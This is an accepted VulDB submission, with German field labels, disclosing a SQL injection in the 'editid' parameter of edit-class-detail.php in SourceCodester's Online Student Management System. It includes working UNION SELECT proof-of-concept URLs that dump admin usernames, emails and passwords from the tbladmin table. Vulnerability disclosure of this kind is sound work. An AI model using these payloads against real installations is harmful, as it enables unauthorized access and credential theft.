| Titel | eduAuthorities sql Injection |
|---|
| Beschreibung | Download link: https://www.sourcecodester.com/php/16137/online-student-management-system-php-free-download.html
Version environment:
php=7.3.4
Mysql=5.7.26
Apache=2.4.39
Preparation:
Create a "student" database in mysql.
Set the database username and password in "dbconnection.php", and then access http://localhost/eduauth/index.php to log in with the account and password.
Vulnerability:
http://localhost/eduauth/edit-class-detail.php?editid=1
On line 54 of the "edit-class-detail.php" file, the parameter "editid" is not filtered and can be directly exploited.
http://localhost/eduauth/edit-class-detail.php?editid=-3%20union%20select%201,group_concat(UserName),3,4%20from%20tbladmin#
You can see that data information is returned.
Poc:
http://localhost/eduauth/edit-class-detail.php?editid=-3%20union%20select%201,group_concat(UserName,'~',Email,'·',Password),3,4%20from%20tbladmin#
Vulnerability principle:
Check the "edit-class-edit-detail.php" file.
On line 55, the user input parameter "editid" is directly concatenated into the SQL statement, and on line 57, a query is performed. |
|---|
| Benutzer | 0chen (UID 41914) |
|---|
| Einreichung | 28.02.2023 08:35 (vor 3 Jahren) |
|---|
| Moderieren | 28.02.2023 21:03 (12 hours later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 222002 [SourceCodester Online Student Management System 1.0 edit-class-detail.php editid SQL Injection] |
|---|
| Punkte | 17 |
|---|